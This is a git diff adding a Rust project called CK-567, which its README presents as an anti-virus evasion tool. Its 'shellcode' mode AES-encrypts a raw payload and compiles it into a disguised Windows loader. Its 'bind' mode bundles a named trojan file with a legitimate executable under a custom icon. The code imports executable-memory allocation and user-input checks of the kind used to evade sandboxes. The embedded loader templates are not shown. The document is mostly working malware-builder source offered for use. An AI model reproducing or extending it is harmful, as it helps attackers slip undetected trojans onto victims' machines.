TheBlindM
diff --git a/‎Cargo.toml
+30 b/‎Cargo.toml
+30
diff --git a/‎README.md
+76 b/‎README.md
+76
diff --git a/‎build.rs
+10 b/‎build.rs
+10
diff --git a/‎ck.ico
4.19 KB b/‎ck.ico
4.19 KB
diff --git a/‎src/core/loader.rs
+138 b/‎src/core/loader.rs
+138
diff --git a/‎src/core/mod.rs
+1 b/‎src/core/mod.rs
+1
diff --git a/‎src/main.rs
+101 b/‎src/main.rs
+101
@@ -0,0 +1,30 @@
+[package]
+name = "CK-567"
+version = "0.1.0"
+edition = "2021"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[build-dependencies]
+winres = "0.1"
+[dependencies]
+aes = "0.8"
+ctr = "0.9"
+cipher = {version = "0.4.3", features=["block-padding"]}
+clap = "4.3.0"
+hex = "0.4.2"
+rust-embed="6.4.0"
+libaes = "*"
+rand = "*"
+base64 = "0.21.2"
+
+winapi = { version = "0.3.9",features = ["libloaderapi","minwinbase","rpc","winnls","heapapi","winuser", "winnt", "memoryapi","sysinfoapi"]}
+
+
+[profile.release]
+opt-level = "z"               # 使用最高级别的优化
+lto = true                    # 启用链接时优化
+codegen-units = 1             # 设置为1以降低编译时间
+panic = 'abort'               # 使用 "abort" 模式来处理 panic
+strip = "symbols"                 # 剥离所有符号，包括调试符号和未使用的符号
+overflow-checks = false       # 禁用溢出检查
@@ -0,0 +1,76 @@
+<div align="center">
+	<h1>CK-567</h1>
+<h2>CK-567 强大的Anti-Virus对抗工具</h2>
+</div>
+
+### 由遮天 项目组指导
+shellcode 格式目前只支持 raw
+
+### 使用
+```
+
+                 ▄████▄   ██ ▄█▀
+                ▒██▀ ▀█   ██▄█▒
+                ▒▓█    ▄ ▓███▄░
+                ▒▓▓▄ ▄██▒▓██ █▄
+                ▒ ▓███▀ ░▒██▒ █▄
+                ░ ░▒ ▒  ░▒ ▒▒ ▓▒
+                  ░  ▒   ░ ░▒ ▒░
+                ░        ░ ░░ ░
+                ░ ░      ░  ░
+                ░
+
+version:0.1
+```
+
+**加载器：**
+```
+                 ▄████▄   ██ ▄█▀
+                ▒██▀ ▀█   ██▄█▒
+                ▒▓█    ▄ ▓███▄░
+                ▒▓▓▄ ▄██▒▓██ █▄
+                ▒ ▓███▀ ░▒██▒ █▄
+                ░ ░▒ ▒  ░▒ ▒▒ ▓▒
+                  ░  ▒   ░ ░▒ ▒░
+                ░        ░ ░░ ░
+                ░ ░      ░  ░
+                ░
+
+version:0.1
+error: the following required arguments were not provided:
+  -f <file>
+  -n <name>
+
+Usage: CK-567.exe shellcode -f <file> -n <name>
+
+For more information, try '--help'.
+```
+```
+CK-567.exe shellcode  -f=C:\Users\10431\Desktop\payload.bin  -n=a1
+```
+
+**捆绑木马：**
+```
+
+                 ▄████▄   ██ ▄█▀
+                ▒██▀ ▀█   ██▄█▒
+                ▒▓█    ▄ ▓███▄░
+                ▒▓▓▄ ▄██▒▓██ █▄
+                ▒ ▓███▀ ░▒██▒ █▄
+                ░ ░▒ ▒  ░▒ ▒▒ ▓▒
+                  ░  ▒   ░ ░▒ ▒░
+                ░        ░ ░░ ░
+                ░ ░      ░  ░
+                ░
+
+version:0.1
+error: the following required arguments were not provided:
+  -f <file>
+  -i <ico>
+  -t <trojan>
+
+Usage: CK-567.exe bind -f <file> -i <ico> -t <trojan>
+
+For more information, try '--help'.
+
+```
@@ -0,0 +1,10 @@
+extern crate winres;
+
+
+fn main() {
+    if cfg!(target_os = "windows") {
+        let mut res = winres::WindowsResource::new();
+        res.set_icon("ck.ico");
+        res.compile().unwrap();
+    }
+}
@@ -0,0 +1,138 @@
+use std::fs::{create_dir_all, read, remove_dir_all, write};
+use std::path::Path;
+use std::process::{Command, Stdio};
+use std::ptr::null;
+
+use aes::Aes256;
+use rust_embed::RustEmbed;
+
+use crate::utils;
+use crate::utils::aesEncrypt;
+
+pub trait Loader {
+    fn load(&self);
+}
+
+
+#[derive(RustEmbed)]
+#[folder = "temp"]
+struct temFile;
+
+const key_placeholder: &str = "${key}";
+const iv_placeholder: &str = "${iv}";
+const base64Str_placeholder: &str = "${base64Str}";
+const package_placeholder: &str = "${packageName}";
+const hexCode_placeholder: &str = "${hexCode}";
+
+impl Loader for ShellCodeHandler {
+    fn load(&self) {
+        println!("shellcode 处理中。。。");
+        let shellcode = match read(&self.file_path) {
+            Ok(res) => res,
+            Err(err) => {
+                println!("{}", err);
+                std::process::exit(1);
+            }
+        };
+
+        let mainFile = temFile::get("shellcode/main.rs").unwrap();
+        let cargoToml = temFile::get("shellcode/Cargo.toml").unwrap();
+        let buildRs = temFile::get("shellcode/build.rs").unwrap();
+        let mainFile_str = std::str::from_utf8(mainFile.data.as_ref()).unwrap();
+        let cargoToml_str = std::str::from_utf8(cargoToml.data.as_ref()).unwrap();
+        let buildRs_str = std::str::from_utf8(buildRs.data.as_ref()).unwrap();
+
+        let (key, iv, ciphertext) = aesEncrypt(shellcode);
+
+        let base64_str = base64::encode(&ciphertext);
+        let mainFile_str = &mainFile_str.replace(&iv_placeholder, &iv);
+        let mainFile_str = &mainFile_str.replace(&key_placeholder, &key);
+        let mainFile_str = &mainFile_str.replace(&hexCode_placeholder, &hex::encode(&base64_str));
+        let cargoToml_str = &cargoToml_str.replace(&package_placeholder, &self.package_name);
+
+
+        if Some(&self.ico).is_some() & !&self.ico.is_empty() {
+            println!("ico:{}", self.ico);
+            let ico = read(&self.ico).unwrap();
+            let _ = write(format!("loader/ck.ico"), ico);
+        }
+
+        let _ = create_dir_all("loader/src");
+        let _ = create_dir_all("loader/.cargo");
+        let _ = write(format!("loader/src/main.rs"), mainFile_str);
+        let _ = write(format!("loader/Cargo.toml"), cargoToml_str);
+        let _ = write(format!("loader/build.rs"), buildRs_str);
+        complie();
+    }
+}
+
+impl Loader for BindHandler {
+    fn load(&self) {
+        println!("捆绑文件中。。。");
+        let path = Path::new(&self.file_path);
+        let file_name = path.file_name().unwrap().to_str().unwrap();
+        let file_stem_name = path.file_stem().unwrap().to_str().unwrap();
+
+        let mainFile = temFile::get("sleeve/main.rs").unwrap();
+        let cargoToml = temFile::get("sleeve/Cargo.toml").unwrap();
+        let buildRs = temFile::get("sleeve/build.rs").unwrap();
+        let mainFile_str = std::str::from_utf8(mainFile.data.as_ref()).unwrap();
+        let buildRs_str = std::str::from_utf8(buildRs.data.as_ref()).unwrap();
+        let cargoToml_str = std::str::from_utf8(cargoToml.data.as_ref()).unwrap();
+
+
+        let cargoToml_str = &cargoToml_str.replace(&package_placeholder, file_stem_name);
+
+        if Some(&self.ico).is_some() & !&self.ico.is_empty() {
+            println!("ico:{}", self.ico);
+            let ico = read(&self.ico).unwrap();
+            let _ = write(format!("loader/ck.ico"), ico);
+        }
+
+        let _ = create_dir_all("loader/src");
+        let _ = create_dir_all("loader/tep");
+        let _ = create_dir_all("loader/.cargo");
+        let _ = write(format!("loader/src/main.rs"), mainFile_str);
+        let _ = write(format!("loader/build.rs"), buildRs_str);
+        let _ = write(format!("loader/Cargo.toml"), cargoToml_str);
+
+        println!("copying file....");
+
+        let file = read(self.file_path.clone()).expect(&format!("文件读取失败：{}", &self.file_path));
+
+        let _ = write(format!("loader/tep/{}", file_name), file);
+
+        //木马文件
+        println!("{}", &self.trojan_file_path);
+        let trojan_file = read(&self.trojan_file_path).expect(&format!("文件读取失败：{}", &self.trojan_file_path));
+        let _ = write(format!("loader/tep/{}.exe", file_stem_name), trojan_file);
+
+         complie();
+    }
+}
+
+pub fn complie() {
+    println!("开始编译...");
+    let mut cmd = Command::new("cmd")
+        .arg("/c")
+        .arg("cd loader && cargo build -Z unstable-options --out-dir ../ --target x86_64-pc-windows-msvc  --release")
+        .spawn()
+        .expect("编译失败！");
+
+    let status = cmd.wait();
+    let _ = remove_dir_all("loader");
+}
+
+
+pub struct ShellCodeHandler {
+    pub(crate) file_path: String,
+    pub(crate) package_name: String,
+    pub(crate) ico: String,
+}
+
+pub struct BindHandler {
+    pub(crate) file_path: String,
+    pub(crate) trojan_file_path: String,
+    pub(crate) ico: String,
+}
+
@@ -0,0 +1 @@
+pub mod loader;
@@ -0,0 +1,101 @@
+use std::borrow::Borrow;
+use std::ptr::null;
+
+use aes::{Aes128, Aes128Dec, Aes128Enc};
+use aes::cipher::{
+    BlockCipher, BlockDecrypt, BlockEncrypt, generic_array::GenericArray,
+    KeyInit,
+};
+use aes::cipher::{BlockDecryptMut, BlockEncryptMut};
+use aes::cipher::block_padding::Pkcs7;
+use clap::{Arg, Command};
+use hex;
+use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect};
+use winapi::um::sysinfoapi::GetTickCount;
+use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE};
+use winapi::um::winuser::{GetCursorPos, GetLastInputInfo, LASTINPUTINFO, MOUSEMOVEPOINT};
+
+use crate::core::loader::{BindHandler, Loader, ShellCodeHandler};
+
+pub mod utils;
+pub mod core;
+
+
+fn main() {
+    println!("
+                 ▄████▄   ██ ▄█▀
+                ▒██▀ ▀█   ██▄█▒
+                ▒▓█    ▄ ▓███▄░
+                ▒▓▓▄ ▄██▒▓██ █▄
+                ▒ ▓███▀ ░▒██▒ █▄
+                ░ ░▒ ▒  ░▒ ▒▒ ▓▒
+                  ░  ▒   ░ ░▒ ▒░
+                ░        ░ ░░ ░
+                ░ ░      ░  ░
+                ░
+");
+    println!("version:0.1");
+
+    let matches = Command::new("ck567")
+        .subcommands([
+            Command::new("bind")
+                .about("捆绑exe")
+                .arg(
+                    Arg::new("file")
+                        .short('f')
+                        .help("exe 路径")
+                        .required(true)
+                ).arg(
+                Arg::new("ico")
+                    .short('i')
+                    .help("ico")
+                    .required(true)
+            ).arg(Arg::new("trojan")
+                .short('t')
+                .required(true)
+                .help("木马文件路径")),
+            Command::new("shellcode")
+                .about("捆绑exe")
+                .arg(
+                    Arg::new("file")
+                        .short('f')
+                        .help("shellcode 路径")
+                        .required(true),
+                )
+                .arg(Arg::new("name").short('n').required(true).help("生成的exe 名称"))
+                .arg(
+                    Arg::new("ico")
+                        .short('i')
+                        .help("exe ico")
+                        .required(false)
+                )
+        ]
+        )
+        .get_matches();
+
+    if let Some(sub_m) = matches.subcommand_matches("shellcode") {
+        let fp = sub_m.get_one::<String>("file").unwrap().clone();
+        let name = sub_m.get_one::<String>("name").unwrap().clone();
+        let ico;
+        if let Some(value) = sub_m.get_one::<String>("ico") {
+            ico = sub_m.get_one::<String>("ico").unwrap().clone();
+        } else {
+            ico = String::new();
+        }
+
+        let shell_code_loader = ShellCodeHandler { file_path: fp, package_name: name, ico };
+        shell_code_loader.load();
+    } else if let Some(sub_m_1) = matches.subcommand_matches("bundle") {
+        let fp = sub_m_1.get_one::<String>("file").unwrap().clone();
+        let trojan = sub_m_1.get_one::<String>("trojan").unwrap().clone();
+        let ico;
+        if let Some(value) = sub_m_1.get_one::<String>("ico") {
+            ico = sub_m_1.get_one::<String>("ico").unwrap().clone();
+        } else {
+            ico = String::new();
+        }
+
+        let bind_handler = BindHandler { file_path: fp, trojan_file_path: trojan, ico };
+        bind_handler.load();
+    }
+}